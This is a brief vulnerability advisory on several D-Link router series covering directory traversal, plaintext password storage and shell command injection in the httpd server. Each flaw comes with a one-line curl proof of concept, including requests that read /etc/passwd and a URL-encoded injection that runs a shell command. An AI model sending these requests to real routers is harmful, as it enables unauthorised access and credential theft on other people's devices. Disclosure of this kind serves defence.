Multiple vulnerabilities in D-Link Routers

Released on Friday 12/10/18:

Multiple vulnerabilities in D-Link routers

Directory Traversal in httpd server in several series of D-Link
routers:
$ curl http://routerip/uir//etc/passwd
Password stored in plaintext in several series of D-Link routers:
$ curl http://routerip/uir//tmp/XXX/0
Shell command injection in httpd server of a several series of D-Link
routers:
$ curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20
%2Fetc%2Fpasswd